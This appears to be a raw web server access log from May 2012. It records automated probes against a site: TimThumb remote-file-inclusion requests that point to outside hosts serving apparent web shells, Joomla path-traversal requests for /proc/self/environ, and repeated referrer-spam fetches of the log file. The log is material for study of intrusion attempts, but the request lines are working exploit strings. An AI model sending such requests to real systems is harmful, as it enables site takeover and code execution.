222.122.45.146 - - [14/May/2012:04:15:33 +0200] "GET //wp-content/themes/coda/lib/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:33 +0200] "GET //wp-content/themes/coda/layouts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:34 +0200] "GET //wp-content/themes/coda/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:34 +0200] "GET //wp-content/themes/coda/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:35 +0200] "GET //wp-content/themes/coda/framework/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:35 +0200] "GET //wp-content/themes/coda/framework/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:36 +0200] "GET //wp-content/themes/coda/functions/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:36 +0200] "GET //wp-content/themes/coda/functions/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:36 +0200] "GET //wp-content/themes/coda/images/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:37 +0200] "GET //wp-content/themes/coda/inc/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.45.146 - - [14/May/2012:04:15:37 +0200] "GET //wp-content/themes/coda/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.212.165.236 - - [14/May/2012:04:16:25 +0200] "GET /stats/?+page_id=?src=http://wordpress.com.cctvnoida.in/cache.php HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
210.212.165.236 - - [14/May/2012:04:16:33 +0200] "GET /stats/./cache/external_8e54aa37d319282402addccb3ac59aba.php?lol HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
210.212.165.236 - - [14/May/2012:04:16:36 +0200] "GET /?+page_id=?src=http://wordpress.com.cctvnoida.in/cache.php HTTP/1.1" 200 945 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:17:01 +0200] "GET /stats//wp-content/themes/cityguide/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:17:01 +0200] "GET /stats//wp-content/themes/cityguide/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:17:02 +0200] "GET /stats//wp-content/themes/cityguide/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:17:02 +0200] "GET //wp-content/themes/cityguide/tools/timthumb.php?src= HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:17:02 +0200] "GET //wp-content/themes/cityguide/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:17:03 +0200] "GET //wp-content/themes/cityguide/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.141.35.196 - - [14/May/2012:04:17:42 +0200] "GET /stats//wp-content/themes/sportpress/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 338 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
95.141.35.196 - - [14/May/2012:04:17:43 +0200] "GET //wp-content/themes/sportpress/scripts/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 332 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
124.217.216.185 - - [14/May/2012:04:17:50 +0200] "GET /stats//wp-content/themes/LeanBiz/timthumb.php?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
124.217.216.185 - - [14/May/2012:04:17:51 +0200] "GET //wp-content/themes/LeanBiz/timthumb.php?src=http://picasa.com.adelbacau.ro/sing.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)"
78.137.37.171 - - [14/May/2012:04:18:31 +0200] "GET /logs/access_log HTTP/1.0" 200 1053797 "http://plaandroid.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
78.137.37.171 - - [14/May/2012:04:18:32 +0200] "GET /logs/access_log HTTP/1.0" 200 1054036 "http://plaandroid.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windows NT; Powered By 64-Bit Alpha Processor)"
78.137.37.171 - - [14/May/2012:04:18:33 +0200] "GET /logs/access_log HTTP/1.0" 200 1054285 "http://plaandroid.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.137.37.171 - - [14/May/2012:04:18:33 +0200] "GET /logs/access_log HTTP/1.0" 200 1054483 "http://plaandroid.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)"
78.137.37.171 - - [14/May/2012:04:18:34 +0200] "GET /logs/access_log HTTP/1.0" 200 1054686 "http://plaandroid.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
77.92.69.1 - - [14/May/2012:04:18:48 +0200] "GET /stats//wp-content/themes/OptimizePress/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:04:18:48 +0200] "GET //wp-content/themes/OptimizePress/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.118.24.103 - - [14/May/2012:04:18:53 +0200] "GET /stats/log.keys.html//wp-content/themes/eNews/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 339 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
217.118.24.103 - - [14/May/2012:04:18:55 +0200] "GET //wp-content/themes/eNews/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 319 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
217.118.24.103 - - [14/May/2012:04:18:56 +0200] "GET /stats//wp-content/themes/eNews/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 325 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
216.70.71.78 - - [14/May/2012:04:19:01 +0200] "GET /stats//wp-content/themes/object/tools/timthumb.php?src= HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:19:01 +0200] "GET /stats//wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:19:01 +0200] "GET /stats//wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:19:01 +0200] "GET //wp-content/themes/object/tools/timthumb.php?src= HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:19:01 +0200] "GET //wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:19:01 +0200] "GET //wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:04:19:04 +0200] "GET /stats/log.keys.html//wp-content/themes/OptimizePress/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:04:19:04 +0200] "GET //wp-content/themes/OptimizePress/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:04:19:04 +0200] "GET /stats//wp-content/themes/OptimizePress/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:19:14 +0200] "GET /stats//wp-content/themes/object/tools/timthumb.php?src= HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:19:14 +0200] "GET /stats//wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:19:15 +0200] "GET /stats//wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:19:15 +0200] "GET //wp-content/themes/object/tools/timthumb.php?src= HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:19:15 +0200] "GET //wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:19:16 +0200] "GET //wp-content/themes/object/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:04:21:37 +0200] "GET /stats/index.html//wp-content/themes/dailyedition/functions/thumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:04:21:39 +0200] "GET /stats/index.html//wp-content/themes/dailyedition/functions/thumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:04:21:41 +0200] "GET //wp-content/themes/dailyedition/functions/thumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:04:21:43 +0200] "GET //wp-content/themes/dailyedition/functions/thumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:04:21:45 +0200] "GET /stats//wp-content/themes/dailyedition/functions/thumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:04:21:47 +0200] "GET /stats//wp-content/themes/dailyedition/functions/thumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:21:48 +0200] "GET /stats//wp-content/plugins/a-gallery/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:21:49 +0200] "GET //wp-content/plugins/a-gallery/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
95.132.213.162 - - [14/May/2012:04:22:25 +0200] "GET /logs/access_log HTTP/1.0" 200 1061998 "http://androidenplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)"
95.132.213.162 - - [14/May/2012:04:22:28 +0200] "GET /logs/access_log HTTP/1.0" 200 1062210 "http://androidenplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
95.132.213.162 - - [14/May/2012:04:22:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1062435 "http://androidenplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1"
95.132.213.162 - - [14/May/2012:04:22:30 +0200] "GET /logs/access_log HTTP/1.0" 200 1062639 "http://androidenplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4"
95.132.213.162 - - [14/May/2012:04:22:30 +0200] "GET /logs/access_log HTTP/1.0" 200 1062842 "http://androidenplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
78.137.37.171 - - [14/May/2012:04:22:37 +0200] "GET /logs/access_log HTTP/1.0" 200 1063084 "http://plaandroid.info/sitemap42.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0"
78.137.37.171 - - [14/May/2012:04:22:38 +0200] "GET /logs/access_log HTTP/1.0" 200 1063282 "http://plaandroid.info/sitemap42.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
78.137.37.171 - - [14/May/2012:04:22:39 +0200] "GET /logs/access_log HTTP/1.0" 200 1063509 "http://plaandroid.info/sitemap42.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Deepnet Explorer 1.5.0; .NET CLR 1.0.3705)"
78.137.37.171 - - [14/May/2012:04:22:40 +0200] "GET /logs/access_log HTTP/1.0" 200 1063736 "http://plaandroid.info/sitemap42.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
78.137.37.171 - - [14/May/2012:04:22:40 +0200] "GET /logs/access_log HTTP/1.0" 200 1063920 "http://plaandroid.info/sitemap42.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
46.45.138.202 - - [14/May/2012:04:23:00 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:23:01 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:24:16 +0200] "GET /stats//wp-content/plugins/a-gallery/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:24:17 +0200] "GET //wp-content/plugins/a-gallery/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
46.45.138.202 - - [14/May/2012:04:24:33 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:24:35 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:24:37 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:24:37 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:24:37 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:24:38 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:24:38 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:24:38 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:24:48 +0200] "GET /stats//wp-content/plugins/cms-pack/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:24:50 +0200] "GET //wp-content/plugins/cms-pack/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
122.201.78.130 - - [14/May/2012:04:25:11 +0200] "GET /stats//wp-content/themes/irresistible/tools/timthumb.php?src=http%3A%2F%2Fpicasa.com.friv-juegos.co%2Fapache%2Fevil.php HTTP/1.1" 404 338 "-" "libwww-perl/6.04"
122.201.78.130 - - [14/May/2012:04:25:11 +0200] "GET //wp-content/themes/irresistible/tools/timthumb.php?src=http%3A%2F%2Fpicasa.com.friv-juegos.co%2Fapache%2Fevil.php HTTP/1.1" 404 332 "-" "libwww-perl/6.04"
122.201.78.130 - - [14/May/2012:04:25:13 +0200] "GET //wp-content/themes/irresistible/tools/timthumb.php?src=http://picasa.com.friv-juegos.co/apache/b1.php HTTP/1.1" 404 332 "-" "libwww-perl/6.04"
122.201.78.130 - - [14/May/2012:04:25:13 +0200] "GET /stats//wp-content/themes/irresistible/tools/timthumb.php?src=http://picasa.com.friv-juegos.co/apache/b1.php HTTP/1.1" 404 338 "-" "libwww-perl/6.04"
46.105.99.98 - - [14/May/2012:04:25:40 +0200] "GET /stats///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:25:45 +0200] "GET ///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:25:41 +0200] "GET /stats///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:25:46 +0200] "GET ///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:05 +0200] "GET /stats//wp-content/themes/mymag/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:05 +0200] "GET /stats//wp-content/themes/mymag/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:06 +0200] "GET /stats//wp-content/themes/mymag/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:06 +0200] "GET //wp-content/themes/mymag/tools/timthumb.php?src= HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:06 +0200] "GET //wp-content/themes/mymag/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:07 +0200] "GET //wp-content/themes/mymag/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:26:36 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:26:36 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:26:36 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:26:36 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:26:36 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:26:36 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:04:26:44 +0200] "GET /logs/access_log HTTP/1.0" 200 1072400 "http://plaandroid.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)"
